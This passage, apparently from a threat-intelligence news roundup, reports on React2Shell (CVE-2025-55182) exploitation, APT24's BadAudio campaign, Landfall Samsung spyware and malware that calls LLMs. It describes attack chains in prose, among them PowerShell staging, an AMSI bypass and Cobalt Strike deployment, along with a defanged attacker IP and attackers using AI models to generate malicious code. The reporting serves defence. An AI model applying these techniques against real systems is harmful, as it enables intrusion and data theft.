(PoC) exploits for the vulnerability. Another working PoC was published by a Taiwanese researcher with the GitHub handle maple3142. Federal Civilian Executive Branch (FCEB) agencies have until December 26, 2025, to apply the necessary updates to secure their networks. Over 77,000 Internet-exposed IP addresses are vulnerable to the critical React2Shell remote code execution flaw (CVE-2025-55182). Researchers have confirmed that attackers have already compromised over 30 organizations across multiple sectors using the React2Shell flaw.
Shadowserver detected 77,664 IP addresses vulnerable to the React2Shell flaw, with approximately 23,700 in the United States. GreyNoise recorded 181 distinct IP addresses attempting to exploit the flaw over the past 24 hours, with most of the traffic appearing automated. Attackers frequently begin with PowerShell commands that perform a basic math function to confirm the device is vulnerable to the remote code execution flaw. Once remote code execution was confirmed, attackers were seen executing base64-encoded PowerShell commands that download additional scripts directly into memory. One observed command executes a second-stage PowerShell script from the external site (23[.]235[.]188[.]3), which is used to disable AMSI to bypass endpoint security and deploy additional payloads. The PowerShell script observed by GreyNoise installs a Cobalt Strike beacon on the targeted device, giving threat actors a foothold on the network. Amazon AWS threat intelligence teams saw rapid exploitation hours after the disclosure of the React CVE-2025-55182 flaw, with infrastructure associated with China-linked APT hacking groups known as Earth Lamia and Jackpot Panda. Palo Alto Networks observed similar exploitation, attributing some of it to UNC5174, a Chinese state-sponsored threat actor believed to be tied to the Chinese Ministry of State Security. The deployed malware in these attacks includes Snowlight and Vshell, both commonly used by Chinese hacking groups for remote access, post-exploitation activity, and to move laterally through a compromised network. Earth Lamia is known for exploiting web application vulnerabilities to target organizations across Latin America, the Middle East, and Southeast Asia. Earth Lamia has historically targeted sectors across financial services, logistics, retail, IT companies, universities, and government organizations. Jackpot Panda primarily targets entities in East and Southeast Asia. 
The Shadowserver Foundation has identified over 77,000 vulnerable IPs following a scan of exposed HTTP services across a wide variety of exposed edge devices and other applications. Censys observed just over 2.15 million instances of internet-facing services that may be affected by this vulnerability, including exposed web services using React Server Components and exposed instances of frameworks such as Next.js, Waku, React Router, and RedwoodSDK. The bug is a pre-authentication remote code execution (RCE) vulnerability which exists in React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0. React issued a security advisory with the relevant patches and updates on December 3. Any internet-accessible server running the affected React Server Components code should be assumed vulnerable until updated as a precaution. AWS observed that many threat actors are attempting to use public PoCs that don’t work in real-world scenarios. AWS noted that the use of these PoCs shows that threat actors prioritize rapid operationalization over thorough testing, attempting to exploit targets with any available tool. Using multiple PoCs to scan for vulnerable environments also gives threat actors a higher chance of identifying vulnerable configurations, even if the PoCs are non-functional. The availability of the PoCs also allows less sophisticated actors to participate in exploitation campaigns. Finally, AWS noted that even failed exploitation attempts create significant noise in logs, potentially masking more sophisticated attacks. The invalid PoCs can give developers a false sense of security when testing for React2Shell. The Shadowserver Foundation detected 28,964 IP addresses vulnerable to the React2Shell flaw as of December 7, 2025, down from 77,664 on December 5, with approximately 10,100 located in the U.S., 3,200 in Germany, and 1,690 in China.
APT24 Utilizes BadAudio Malware in Multi-Year Espionage Campaign
APT24, a China-linked threat group, has been using previously undocumented BadAudio malware in a nearly three-year espionage campaign targeting Windows systems. The campaign, active since November 2022, employed various attack methods including spearphishing, supply-chain compromise, and watering hole attacks. The malware is heavily obfuscated and uses sophisticated techniques to evade detection and hinder analysis. From November 2022 to at least September 2025, APT24 compromised over 20 legitimate websites to inject malicious JavaScript code, targeting specific visitors. Starting July 2024, the group compromised a Taiwanese digital marketing company, injecting malicious JavaScript into widely used libraries, affecting over 1,000 domains. Additionally, APT24 launched spearphishing operations using emails impersonating animal rescue organizations and leveraging cloud services for malware distribution. The BadAudio malware collects system details, communicates with a hard-coded C2 server, and executes payloads in memory using DLL sideloading. Despite its prolonged use, the malware remained largely undetected, with only a few samples flagged by antivirus engines. APT24 has been active since at least 2008, targeting various sectors including government, healthcare, construction, and telecommunications. The group is closely related to the Earth Aughisky group, which has also deployed Taidoor and Specas malware.
Landfall Android Spyware Exploits Samsung Zero-Day via WhatsApp
The Landfall Android spyware targeted Samsung devices through a zero-day vulnerability (CVE-2025-21042) in a Samsung image processing library. The exploit was delivered via a malicious DNG image sent through WhatsApp, affecting Samsung Galaxy S22, S23, S24, Z Fold4, and Z Flip4 phones. The spyware enables microphone recording, location tracking, and data exfiltration. The attacks have been ongoing since at least July 2024, and the vulnerability was patched by Samsung in April. The threat actor, tracked as CL-UNK-1054, remains unidentified, with potential links to the Stealth Falcon group and other surveillance vendors. The attacks primarily targeted individuals in the Middle East and North Africa. The exploit involved a zero-click approach, and the malicious DNG files contained an embedded ZIP file with a shared object library to run the spyware. The spyware manipulated the device's SELinux policy to gain elevated permissions and facilitate persistence, and communicated with a command-and-control (C2) server over HTTPS for beaconing and receiving next-stage payloads. The spyware can fingerprint devices based on hardware and SIM IDs and targets a broad range of Samsung’s latest flagship models, excluding the latest S25 series devices. Unit 42 identified six C2 servers linked to the LandFall campaign, with some flagged by Turkey’s CERT. C2 domain registration and infrastructure patterns share similarities with those seen in Stealth Falcon operations, originating from the United Arab Emirates. CISA has added CVE-2025-21042 to its Known Exploited Vulnerabilities catalog, ordering federal agencies to patch within three weeks.
AI-Powered Malware Families Deployed in the Wild
Google's Threat Intelligence Group (GTIG) has identified new malware families that leverage artificial intelligence (AI) and large language models (LLMs) for dynamic self-modification during execution. These malware families, including PromptFlux, PromptSteal, FruitShell, QuietVault, and PromptLock, demonstrate advanced capabilities for evading detection and maintaining persistence. PromptFlux, an experimental VBScript dropper, uses Google's LLM Gemini to generate obfuscated VBScript variants and evade antivirus software. It attempts persistence via Startup folder entries and spreads laterally on removable drives and mapped network shares. The malware is assessed to be in a development or testing phase and to be financially motivated. PromptSteal is a data miner written in Python that queries the LLM Qwen2.5-Coder-32B-Instruct to generate one-line Windows commands to collect information and documents in specific folders and send the data to a command-and-control (C2) server. It is used by the Russian state-sponsored actor APT28 in attacks targeting Ukraine. The use of AI in malware enables adversaries to create more versatile and adaptive threats, posing significant challenges for cybersecurity defenses. Various threat actors, including those from China, Iran, and North Korea, have been observed abusing AI models like Gemini across different stages of the attack lifecycle. The underground market for AI-powered cybercrime tools is also growing, with offerings ranging from deepfake generation to malware development and vulnerability exploitation.